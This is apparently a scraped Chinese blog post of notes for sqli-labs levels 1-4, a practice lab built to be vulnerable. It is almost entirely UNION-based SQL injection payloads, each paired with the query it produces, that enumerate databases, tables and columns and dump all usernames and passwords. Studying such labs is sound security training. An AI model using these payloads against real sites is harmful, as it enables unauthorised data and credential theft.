zoukankan      html  css  js  c++  java

  • sqlilabs 1-4

    near '1' --+ ' LIMIT 0,1


    ?id=999' union select 1,database(),5 --+ 当前数据库
    ?id=999' union select 1,user(),5 --+ 当前用户名

    爆数据库
    ?id=-1' union select 1,group_concat(schema_name),5 from information_schema.schemata --+

    SELECT * FROM users WHERE id='-1'union select 1,group_concat(schema_name),3 from information_schema.schemata --+ LIMIT 0,1

    爆 security 数据表
    ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

    SELECT * FROM users WHERE id='-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ LIMIT 0,1


    爆users表的列
    ?id=-1' union select 1,group_concat(column_name),5 from information_schema.columns where table_name='users' --+

    SELECT * FROM users WHERE id='-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ LIMIT 0,1


    爆 users 的所有数据
    ?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

    SELECT * FROM users WHERE id='-1'union select 1,group_concat(username),group_concat(password) from users --+ LIMIT 0,1
  • 相关阅读:
    DropDownList判断值是否存在下拉列表中
    postgre教程
    Cookie seesion 赋值
    Winform定时启动
    ASP.NET数据绑定控件
    ASP.NET常用数据绑定控件优劣总结
    Cards and Joy (dp好题)
    River Hopscotch (二分)
    剪花布条(KMP入门)
    GCD (区间数的质因子打表+容斥原理)
  • 原文地址:https://www.cnblogs.com/CMlhc/p/8858941.html
Copyright © 2011-2022 走看看